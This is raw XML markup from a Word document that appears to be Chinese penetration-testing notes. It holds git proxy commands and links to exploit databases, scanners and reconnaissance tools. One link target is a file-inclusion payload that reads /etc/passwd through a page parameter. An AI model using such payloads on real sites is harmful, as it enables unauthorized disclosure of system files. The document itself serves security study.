        <w:t>git config --global https.proxy socks5://127.0.0.1:1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0342F1A6" w14:textId="51A49313" w:rsidR="002449D8" w:rsidRDefault="002449D8" w:rsidP="00F83176"/>
    <w:p w14:paraId="31AB1805" w14:textId="5CFECB92" w:rsidR="002449D8" w:rsidRDefault="002449D8" w:rsidP="00F83176">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-----------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7334A0" w14:textId="77777777" w:rsidR="002449D8" w:rsidRPr="002449D8" w:rsidRDefault="002449D8" w:rsidP="002449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15250"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002449D8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="515250"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>git config --global --unset http.proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B6B783" w14:textId="77777777" w:rsidR="002449D8" w:rsidRPr="002449D8" w:rsidRDefault="002449D8" w:rsidP="002449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15250"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CAB112E" w14:textId="024C808A" w:rsidR="002449D8" w:rsidRPr="002449D8" w:rsidRDefault="002449D8" w:rsidP="002449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15250"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002449D8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="515250"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>git config --global --unset https.proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B8592" w14:textId="77777777" w:rsidR="002449D8" w:rsidRPr="002449D8" w:rsidRDefault="002449D8" w:rsidP="00F83176"/>
    <w:sectPr w:rsidR="002449D8" w:rsidRPr="002449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9F946" w14:textId="77777777" w:rsidR="00BB3AB0" w:rsidRDefault="00BB3AB0" w:rsidP="0038154F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="32DE5654" w14:textId="77777777" w:rsidR="00BB3AB0" w:rsidRDefault="00BB3AB0" w:rsidP="0038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FFA68" w14:textId="77777777" w:rsidR="00BB3AB0" w:rsidRDefault="00BB3AB0" w:rsidP="0038154F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0A2DC3FD" w14:textId="77777777" w:rsidR="00BB3AB0" w:rsidRDefault="00BB3AB0" w:rsidP="0038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6E8C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F9A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D69EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7482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C6EAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE0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D14E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6284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F0E8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3928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26638"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5FF2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05B74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BC00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67BF1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A3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371B6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="458E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55449"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80E65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56226"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C2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63D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A1049B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345AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE1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70240"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1E0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320B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8208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CA3D76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5336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32089"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA14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D48BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD8C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E760D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="536A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0C360D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A5E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A2932"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F3C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F2627"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="658C3F92"/>
    <w:lvl w:ilvl="0" w:tplc="526C8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93637C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8D0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74EFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCF6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1F0B95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED8C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A9401B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC6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F76B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="552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83F50"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28FE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45BD3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB84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53BC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D07C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382EF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84DA1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5228AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1E2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9000B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4354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CE25E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C34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1"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="3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3A"/>
    <w:rsid w:val="000121D9"/>
    <w:rsid w:val="00034129"/>
    <w:rsid w:val="00044372"/>
    <w:rsid w:val="00050AA0"/>
    <w:rsid w:val="000523A1"/>
    <w:rsid w:val="00055621"/>
    <w:rsid w:val="00056C4E"/>
    <w:rsid w:val="000764FB"/>
    <w:rsid w:val="000824C0"/>
    <w:rsid w:val="00082A30"/>
    <w:rsid w:val="00091445"/>
    <w:rsid w:val="000A449A"/>
    <w:rsid w:val="000C1FDE"/>
    <w:rsid w:val="000C3152"/>
    <w:rsid w:val="000C59ED"/>
    <w:rsid w:val="000C7A30"/>
    <w:rsid w:val="000D5101"/>
    <w:rsid w:val="0010018C"/>
    <w:rsid w:val="001011AF"/>
    <w:rsid w:val="00103D75"/>
    <w:rsid w:val="001107F6"/>
    <w:rsid w:val="00114A5F"/>
    <w:rsid w:val="00122846"/>
    <w:rsid w:val="00126765"/>
    <w:rsid w:val="0013189A"/>
    <w:rsid w:val="001445BE"/>
    <w:rsid w:val="00162B31"/>
    <w:rsid w:val="001646FC"/>
    <w:rsid w:val="00164719"/>
    <w:rsid w:val="00164D08"/>
    <w:rsid w:val="00165CA1"/>
    <w:rsid w:val="00173CA1"/>
    <w:rsid w:val="001815CA"/>
    <w:rsid w:val="00191C2D"/>
    <w:rsid w:val="00192BFF"/>
    <w:rsid w:val="00196C94"/>
    <w:rsid w:val="001B23D2"/>
    <w:rsid w:val="001C2F72"/>
    <w:rsid w:val="001C373D"/>
    <w:rsid w:val="001C5082"/>
    <w:rsid w:val="001D58EC"/>
    <w:rsid w:val="001F3D17"/>
    <w:rsid w:val="002035DC"/>
    <w:rsid w:val="002110F6"/>
    <w:rsid w:val="00225A5F"/>
    <w:rsid w:val="00230607"/>
    <w:rsid w:val="002449D8"/>
    <w:rsid w:val="00255364"/>
    <w:rsid w:val="0028032E"/>
    <w:rsid w:val="00280AA9"/>
    <w:rsid w:val="002864CA"/>
    <w:rsid w:val="00290E17"/>
    <w:rsid w:val="002A3401"/>
    <w:rsid w:val="002A5D7C"/>
    <w:rsid w:val="002B554F"/>
    <w:rsid w:val="002B71AE"/>
    <w:rsid w:val="002C54F7"/>
    <w:rsid w:val="002D5237"/>
    <w:rsid w:val="002D6C60"/>
    <w:rsid w:val="00336BC5"/>
    <w:rsid w:val="0034210A"/>
    <w:rsid w:val="003439C6"/>
    <w:rsid w:val="0035107E"/>
    <w:rsid w:val="003630CF"/>
    <w:rsid w:val="00367951"/>
    <w:rsid w:val="003719B2"/>
    <w:rsid w:val="0038154F"/>
    <w:rsid w:val="003853C3"/>
    <w:rsid w:val="0039127E"/>
    <w:rsid w:val="0039199F"/>
    <w:rsid w:val="00394403"/>
    <w:rsid w:val="003A669C"/>
    <w:rsid w:val="003C3D8B"/>
    <w:rsid w:val="00407008"/>
    <w:rsid w:val="0043725F"/>
    <w:rsid w:val="0045396C"/>
    <w:rsid w:val="00456CC1"/>
    <w:rsid w:val="00460537"/>
    <w:rsid w:val="004656A4"/>
    <w:rsid w:val="004657EF"/>
    <w:rsid w:val="00473D7C"/>
    <w:rsid w:val="0048048C"/>
    <w:rsid w:val="00483503"/>
    <w:rsid w:val="004A1BB7"/>
    <w:rsid w:val="004A36CF"/>
    <w:rsid w:val="004A6F47"/>
    <w:rsid w:val="004F1A15"/>
    <w:rsid w:val="004F65C1"/>
    <w:rsid w:val="00511EEF"/>
    <w:rsid w:val="005227D7"/>
    <w:rsid w:val="0052486C"/>
    <w:rsid w:val="00531A8E"/>
    <w:rsid w:val="005357F0"/>
    <w:rsid w:val="005474CB"/>
    <w:rsid w:val="00562437"/>
    <w:rsid w:val="00577B8E"/>
    <w:rsid w:val="00581AC9"/>
    <w:rsid w:val="00582F10"/>
    <w:rsid w:val="005A3EC1"/>
    <w:rsid w:val="005A5097"/>
    <w:rsid w:val="005A533B"/>
    <w:rsid w:val="005B2B06"/>
    <w:rsid w:val="005B74A2"/>
    <w:rsid w:val="005C3B9B"/>
    <w:rsid w:val="005C4DB7"/>
    <w:rsid w:val="005D4F36"/>
    <w:rsid w:val="005E4753"/>
    <w:rsid w:val="00620C12"/>
    <w:rsid w:val="00622ABA"/>
    <w:rsid w:val="00631F7E"/>
    <w:rsid w:val="00664EC7"/>
    <w:rsid w:val="00664EFD"/>
    <w:rsid w:val="0066674E"/>
    <w:rsid w:val="00670246"/>
    <w:rsid w:val="006738C8"/>
    <w:rsid w:val="00690289"/>
    <w:rsid w:val="006A0058"/>
    <w:rsid w:val="006A3B28"/>
    <w:rsid w:val="006B2F26"/>
    <w:rsid w:val="006B3FE4"/>
    <w:rsid w:val="006B6474"/>
    <w:rsid w:val="006C7551"/>
    <w:rsid w:val="006D676B"/>
    <w:rsid w:val="006E5E33"/>
    <w:rsid w:val="006E7014"/>
    <w:rsid w:val="006F322C"/>
    <w:rsid w:val="006F5C57"/>
    <w:rsid w:val="006F7A6B"/>
    <w:rsid w:val="00702405"/>
    <w:rsid w:val="00704CE5"/>
    <w:rsid w:val="00710E59"/>
    <w:rsid w:val="00724E9A"/>
    <w:rsid w:val="00726D22"/>
    <w:rsid w:val="00735F30"/>
    <w:rsid w:val="00744980"/>
    <w:rsid w:val="00751BAA"/>
    <w:rsid w:val="00756E3A"/>
    <w:rsid w:val="00757305"/>
    <w:rsid w:val="00760CA7"/>
    <w:rsid w:val="007652F0"/>
    <w:rsid w:val="00773E0B"/>
    <w:rsid w:val="007814B7"/>
    <w:rsid w:val="0078275F"/>
    <w:rsid w:val="00787774"/>
    <w:rsid w:val="00797674"/>
    <w:rsid w:val="007A3227"/>
    <w:rsid w:val="007B700F"/>
    <w:rsid w:val="007D0F2D"/>
    <w:rsid w:val="007E2CAE"/>
    <w:rsid w:val="007F185D"/>
    <w:rsid w:val="007F5999"/>
    <w:rsid w:val="007F6592"/>
    <w:rsid w:val="007F7103"/>
    <w:rsid w:val="008027AB"/>
    <w:rsid w:val="0082359F"/>
    <w:rsid w:val="00830512"/>
    <w:rsid w:val="00850C93"/>
    <w:rsid w:val="00851549"/>
    <w:rsid w:val="00863453"/>
    <w:rsid w:val="00864742"/>
    <w:rsid w:val="008756F8"/>
    <w:rsid w:val="00877529"/>
    <w:rsid w:val="00892C98"/>
    <w:rsid w:val="008C4CAF"/>
    <w:rsid w:val="008C6A82"/>
    <w:rsid w:val="008D2631"/>
    <w:rsid w:val="008D2A0E"/>
    <w:rsid w:val="008E610F"/>
    <w:rsid w:val="008E7CBA"/>
    <w:rsid w:val="008F0A7A"/>
    <w:rsid w:val="008F3489"/>
    <w:rsid w:val="008F5DDF"/>
    <w:rsid w:val="00907A06"/>
    <w:rsid w:val="00921670"/>
    <w:rsid w:val="00935252"/>
    <w:rsid w:val="009415C3"/>
    <w:rsid w:val="0094298A"/>
    <w:rsid w:val="00951B28"/>
    <w:rsid w:val="009534B4"/>
    <w:rsid w:val="0095496E"/>
    <w:rsid w:val="00972178"/>
    <w:rsid w:val="00982F28"/>
    <w:rsid w:val="0098533C"/>
    <w:rsid w:val="009A2B33"/>
    <w:rsid w:val="009A4AF5"/>
    <w:rsid w:val="009B1D8E"/>
    <w:rsid w:val="009B36FD"/>
    <w:rsid w:val="009D12C4"/>
    <w:rsid w:val="00A01914"/>
    <w:rsid w:val="00A14128"/>
    <w:rsid w:val="00A2689C"/>
    <w:rsid w:val="00A40993"/>
    <w:rsid w:val="00A42238"/>
    <w:rsid w:val="00A448A4"/>
    <w:rsid w:val="00A538A2"/>
    <w:rsid w:val="00A54D5E"/>
    <w:rsid w:val="00A60C00"/>
    <w:rsid w:val="00A930EC"/>
    <w:rsid w:val="00AA5D0B"/>
    <w:rsid w:val="00AB2B16"/>
    <w:rsid w:val="00AD1608"/>
    <w:rsid w:val="00AD3AAE"/>
    <w:rsid w:val="00AD3F3C"/>
    <w:rsid w:val="00B20CC4"/>
    <w:rsid w:val="00B240C0"/>
    <w:rsid w:val="00B356D4"/>
    <w:rsid w:val="00B3698D"/>
    <w:rsid w:val="00B403D9"/>
    <w:rsid w:val="00B43685"/>
    <w:rsid w:val="00B5008B"/>
    <w:rsid w:val="00B54C43"/>
    <w:rsid w:val="00B5783C"/>
    <w:rsid w:val="00B704F6"/>
    <w:rsid w:val="00B74DED"/>
    <w:rsid w:val="00B807C4"/>
    <w:rsid w:val="00B81EF1"/>
    <w:rsid w:val="00B92472"/>
    <w:rsid w:val="00BA50A6"/>
    <w:rsid w:val="00BB29BE"/>
    <w:rsid w:val="00BB3AB0"/>
    <w:rsid w:val="00BC34FC"/>
    <w:rsid w:val="00BC3FCD"/>
    <w:rsid w:val="00BE2C34"/>
    <w:rsid w:val="00BF424B"/>
    <w:rsid w:val="00BF52E4"/>
    <w:rsid w:val="00C00103"/>
    <w:rsid w:val="00C03BAD"/>
    <w:rsid w:val="00C314AE"/>
    <w:rsid w:val="00C406D8"/>
    <w:rsid w:val="00C51675"/>
    <w:rsid w:val="00C62106"/>
    <w:rsid w:val="00C72D9D"/>
    <w:rsid w:val="00C75246"/>
    <w:rsid w:val="00C77D64"/>
    <w:rsid w:val="00C804F3"/>
    <w:rsid w:val="00CA2DA4"/>
    <w:rsid w:val="00CA4616"/>
    <w:rsid w:val="00CA794F"/>
    <w:rsid w:val="00CA7E51"/>
    <w:rsid w:val="00CB3A3A"/>
    <w:rsid w:val="00CC39FE"/>
    <w:rsid w:val="00CD3AF6"/>
    <w:rsid w:val="00CE2028"/>
    <w:rsid w:val="00CE5F8F"/>
    <w:rsid w:val="00D02335"/>
    <w:rsid w:val="00D11994"/>
    <w:rsid w:val="00D37ED5"/>
    <w:rsid w:val="00D5070E"/>
    <w:rsid w:val="00D52FDC"/>
    <w:rsid w:val="00D53865"/>
    <w:rsid w:val="00D53C32"/>
    <w:rsid w:val="00D54804"/>
    <w:rsid w:val="00D7298B"/>
    <w:rsid w:val="00D75791"/>
    <w:rsid w:val="00D80243"/>
    <w:rsid w:val="00D860D9"/>
    <w:rsid w:val="00D86AD6"/>
    <w:rsid w:val="00D950EE"/>
    <w:rsid w:val="00D97F5F"/>
    <w:rsid w:val="00DA06A1"/>
    <w:rsid w:val="00DB5BB9"/>
    <w:rsid w:val="00DC6197"/>
    <w:rsid w:val="00DD007F"/>
    <w:rsid w:val="00DF58C3"/>
    <w:rsid w:val="00E0097B"/>
    <w:rsid w:val="00E03C8D"/>
    <w:rsid w:val="00E04FEA"/>
    <w:rsid w:val="00E13132"/>
    <w:rsid w:val="00E422F6"/>
    <w:rsid w:val="00E44FAC"/>
    <w:rsid w:val="00E534A0"/>
    <w:rsid w:val="00E54E3C"/>
    <w:rsid w:val="00E605F2"/>
    <w:rsid w:val="00E61A73"/>
    <w:rsid w:val="00E80A79"/>
    <w:rsid w:val="00E92EEE"/>
    <w:rsid w:val="00EA1904"/>
    <w:rsid w:val="00EA5F02"/>
    <w:rsid w:val="00EB3504"/>
    <w:rsid w:val="00EC1457"/>
    <w:rsid w:val="00ED0EC3"/>
    <w:rsid w:val="00ED61FB"/>
    <w:rsid w:val="00EE77E5"/>
    <w:rsid w:val="00EF06F7"/>
    <w:rsid w:val="00EF171B"/>
    <w:rsid w:val="00F01180"/>
    <w:rsid w:val="00F2049E"/>
    <w:rsid w:val="00F22085"/>
    <w:rsid w:val="00F22946"/>
    <w:rsid w:val="00F3231A"/>
    <w:rsid w:val="00F33CED"/>
    <w:rsid w:val="00F3602C"/>
    <w:rsid w:val="00F41B50"/>
    <w:rsid w:val="00F450A0"/>
    <w:rsid w:val="00F51BAD"/>
    <w:rsid w:val="00F6706B"/>
    <w:rsid w:val="00F7051C"/>
    <w:rsid w:val="00F7344D"/>
    <w:rsid w:val="00F76936"/>
    <w:rsid w:val="00F811AB"/>
    <w:rsid w:val="00F823C0"/>
    <w:rsid w:val="00F83176"/>
    <w:rsid w:val="00F84CBD"/>
    <w:rsid w:val="00F90FB1"/>
    <w:rsid w:val="00F91404"/>
    <w:rsid w:val="00F922B5"/>
    <w:rsid w:val="00F94D6E"/>
    <w:rsid w:val="00FA7087"/>
    <w:rsid w:val="00FB2EB8"/>
    <w:rsid w:val="00FB531E"/>
    <w:rsid w:val="00FB6A41"/>
    <w:rsid w:val="00FC2697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0DC9B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BB7039E7-DBF4-4422-847B-075F7136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F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29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B3A3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6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31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B3A3A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C80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804F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804F3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7298B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D72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07A0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81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154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1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154F"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00CA2DA4"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00A42238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6B3FE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B36FD"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009B36FD"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-comment">
    <w:name w:val="hljs-comment"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="000A449A"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="l0">
    <w:name w:val="l0"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00BB29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B29BE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pun">
    <w:name w:val="pun"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00BB29BE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="com">
    <w:name w:val="com"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00BB29BE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002D6C60"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="token">
    <w:name w:val="token"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00851549"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1loh5">
    <w:name w:val="_1loh_5"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00BC3FCD"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="builtin">
    <w:name w:val="built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00BC34FC"/>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00BC34FC"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="008F5DDF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="008F5DDF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="标题 4 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E131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eyword">
    <w:name w:val="keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F2049E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="number">
    <w:name w:val="number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F2049E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="string">
    <w:name w:val="string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006A0058"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="has-text-color">
    <w:name w:val="has-text-color"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="006E70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">
    <w:name w:val="p"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F22085"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F22085"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mi">
    <w:name w:val="mi"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F22085"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="n">
    <w:name w:val="n"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F22085"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F22085"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c1">
    <w:name w:val="c1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00F22085"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-snippetouter">
    <w:name w:val="code-snippet_outer"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="005E4753"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-snippetkeyword">
    <w:name w:val="code-snippet__keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="005E4753"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-snippetnumber">
    <w:name w:val="code-snippet__number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="005E4753"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="code-snippetstring">
    <w:name w:val="code-snippet__string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="005E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8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50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5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nblogs.com/vigarbuaa/p/3371500.html" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.beianbeian.com/" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webiplookup.com/" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.51cto.com/wt7315/1865580" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bbs.ichunqiu.com/forum.php" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stool.chinaz.com/same" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/robertdavidgraham/masscan" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Threezh1/JSFinder" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xxx.com/index.php?page=/etc/passwd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.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://paper.seebug.org/219/" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.beianbeian.com/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://webiplookup.com/" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://vulners.com/" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 